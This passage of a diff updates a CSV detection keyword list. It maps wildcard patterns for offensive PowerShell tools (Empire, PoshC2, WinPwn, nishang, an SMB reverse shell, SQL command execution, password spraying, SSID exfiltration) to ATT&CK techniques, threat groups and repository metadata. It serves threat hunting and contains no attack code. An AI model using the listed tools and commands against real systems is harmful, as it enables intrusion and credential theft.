poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","0","N/A","10","10","1602","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" +"*Invoke-SMBNegotiate 
-ComputerName localhost*","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","0","N/A","N/A","10","2961","495","2023-07-13T14:09:33Z","2018-03-07T12:51:25Z" +"*Invoke-SMBNegotiate*","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","2961","495","2023-07-13T14:09:33Z","2018-03-07T12:51:25Z" "*Invoke-SmbObey *","offensive_tool_keyword","smb-reverse-shell","A Reverse Shell which uses an XML file on an SMB share as a communication channel.","T1021.002 - T1027 - T1105","TA0008 - TA0010 - TA0002","N/A","N/A","C2","https://github.com/r1cksec/smb-reverse-shell","1","0","N/A","10","10","9","0","2022-07-31T10:05:53Z","2022-01-16T21:02:14Z" "*Invoke-SmbObey.*","offensive_tool_keyword","smb-reverse-shell","A Reverse Shell which uses an XML file on an SMB share as a communication channel.","T1021.002 - T1027 - T1105","TA0008 - TA0010 - TA0002","N/A","N/A","C2","https://github.com/r1cksec/smb-reverse-shell","1","1","N/A","10","10","9","0","2022-07-31T10:05:53Z","2022-01-16T21:02:14Z" "*Invoke-SmbOrder *","offensive_tool_keyword","smb-reverse-shell","A Reverse Shell which uses an XML file on an SMB share as a communication channel.","T1021.002 - T1027 - T1105","TA0008 - TA0010 - TA0002","N/A","N/A","C2","https://github.com/r1cksec/smb-reverse-shell","1","0","N/A","10","10","9","0","2022-07-31T10:05:53Z","2022-01-16T21:02:14Z" "*Invoke-SmbOrder.*","offensive_tool_keyword","smb-reverse-shell","A Reverse Shell which uses an XML file on an SMB share as a communication channel.","T1021.002 - T1027 - T1105","TA0008 - TA0010 - 
TA0002","N/A","N/A","C2","https://github.com/r1cksec/smb-reverse-shell","1","1","N/A","10","10","9","0","2022-07-31T10:05:53Z","2022-01-16T21:02:14Z" "*Invoke-SMBRemoting.ps1*","offensive_tool_keyword","Invoke-SMBRemoting","Interactive Shell and Command Execution over Named-Pipes (SMB)","T1059 - T1021.002 - T1572","TA0002 - TA0008 - TA0011","N/A","N/A","Lateral Movement","https://github.com/Leo4j/Invoke-SMBRemoting","1","1","N/A","9","1","22","4","2023-10-02T10:21:34Z","2023-09-06T16:00:47Z" "*Invoke-SMBRemoting-main*","offensive_tool_keyword","Invoke-SMBRemoting","Interactive Shell and Command Execution over Named-Pipes (SMB)","T1059 - T1021.002 - T1572","TA0002 - TA0008 - TA0011","N/A","N/A","Lateral Movement","https://github.com/Leo4j/Invoke-SMBRemoting","1","1","N/A","9","1","22","4","2023-10-02T10:21:34Z","2023-09-06T16:00:47Z" -"*Invoke-SMBScanner*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","Invoke-SmbScanner.ps1","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" -"*Invoke-SmbScanner*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","Invoke-SmbScanner.ps1","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" -"*Invoke-SmbScanner*","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1080","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" -"*Invoke-Snaffler*","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","10","10","1257","284","2023-03-01T17:10:43Z","2020-04-06T16:34:52Z" -"*Invoke-Snaffler*","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","2960","495","2023-07-13T14:09:33Z","2018-03-07T12:51:25Z" 
-"*invoke-sniffer *","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","0","N/A","10","10","1601","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" +"*Invoke-SMBScanner*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","Invoke-SmbScanner.ps1","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*Invoke-SmbScanner*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","Invoke-SmbScanner.ps1","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*Invoke-SmbScanner*","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1080","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*Invoke-Snaffler*","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","10","10","1260","284","2023-03-01T17:10:43Z","2020-04-06T16:34:52Z" +"*Invoke-Snaffler*","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","2961","495","2023-07-13T14:09:33Z","2018-03-07T12:51:25Z" 
+"*invoke-sniffer *","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","0","N/A","10","10","1602","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" "*Invoke-SocksProxy *","offensive_tool_keyword","Invoke-SocksProxy","Socks proxy - and reverse socks server using powershell.","T1090 - T1021.001 - T1021.002","TA0002","N/A","N/A","C2","https://github.com/p3nt4/Invoke-SocksProxy","1","0","N/A","10","10","742","176","2021-03-21T21:00:40Z","2017-11-09T06:20:40Z" "*Invoke-SocksProxy*","offensive_tool_keyword","Invoke-SocksProxy","Creates a local or reverse Socks proxy using powershell","T1090 - T1573 - T1059 - T1021","TA0002 - TA0011 - TA0008","N/A","N/A","POST Exploitation tools","https://github.com/p3nt4/Invoke-SocksProxy","1","0","N/A","N/A","10","742","176","2021-03-21T21:00:40Z","2017-11-09T06:20:40Z" "*Invoke-SocksProxy.*","offensive_tool_keyword","Invoke-SocksProxy","Socks proxy - and reverse socks server using powershell.","T1090 - T1021.001 - T1021.002","TA0002","N/A","N/A","C2","https://github.com/p3nt4/Invoke-SocksProxy","1","1","N/A","10","10","742","176","2021-03-21T21:00:40Z","2017-11-09T06:20:40Z" -"*Invoke-Spoolsample*","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation 
tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","10","10","1257","284","2023-03-01T17:10:43Z","2020-04-06T16:34:52Z" -"*Invoke-SpoolSample*","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","2960","495","2023-07-13T14:09:33Z","2018-03-07T12:51:25Z" -"*Invoke-SprayEmptyPassword*","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","2960","495","2023-07-13T14:09:33Z","2018-03-07T12:51:25Z" +"*Invoke-Spoolsample*","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","10","10","1260","284","2023-03-01T17:10:43Z","2020-04-06T16:34:52Z" +"*Invoke-SpoolSample*","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","2961","495","2023-07-13T14:09:33Z","2018-03-07T12:51:25Z" +"*Invoke-SprayEmptyPassword*","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation 
Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","2961","495","2023-07-13T14:09:33Z","2018-03-07T12:51:25Z" "*Invoke-SQLAudit*","offensive_tool_keyword","AD exploitation cheat sheet","Scan for MSSQL misconfigurations to escalate to System Admin","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://stealthbits.com/blog/compromise-powerupsql-sql-attacks/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" -"*Invoke-SQLAudit*","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","2960","495","2023-07-13T14:09:33Z","2018-03-07T12:51:25Z" -"*Invoke-SQLDumpInfo*","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","2960","495","2023-07-13T14:09:33Z","2018-03-07T12:51:25Z" +"*Invoke-SQLAudit*","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","2961","495","2023-07-13T14:09:33Z","2018-03-07T12:51:25Z" +"*Invoke-SQLDumpInfo*","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","2961","495","2023-07-13T14:09:33Z","2018-03-07T12:51:25Z" "*Invoke-SQLOSCmd -Instance * -Command 
*","offensive_tool_keyword","AD exploitation cheat sheet","Run command (enables XP_CMDSHELL automatically if required)","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://casvancooten.com/posts/2020/11/windows-active-directory-exploitation-cheat-sheet-and-command-reference","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" -"*Invoke-SQLOSCmd.ps1*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","Invoke-SQLOSCmd.ps1","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" 
-"*Invoke-SQLOSCmd.ps1*","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1096","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" -"*Invoke-SQLUncPathInjection*","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation 
Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","2960","495","2023-07-13T14:09:33Z","2018-03-07T12:51:25Z" -"*Invoke-SSHCommand.ps1*","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1094","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" -"*Invoke-SSIDExfil*","offensive_tool_keyword","nishang","Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security penetration testing and red teaming. 
Nishang is useful during all phases of penetration testing.","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/samratashok/nishang","1","1","N/A","N/A","10","7849","2360","2023-09-05T07:54:08Z","2014-05-19T11:48:24Z" -"*Invoke-StandIn.*","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","10","10","1257","284","2023-03-01T17:10:43Z","2020-04-06T16:34:52Z" +"*Invoke-SQLOSCmd.ps1*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - 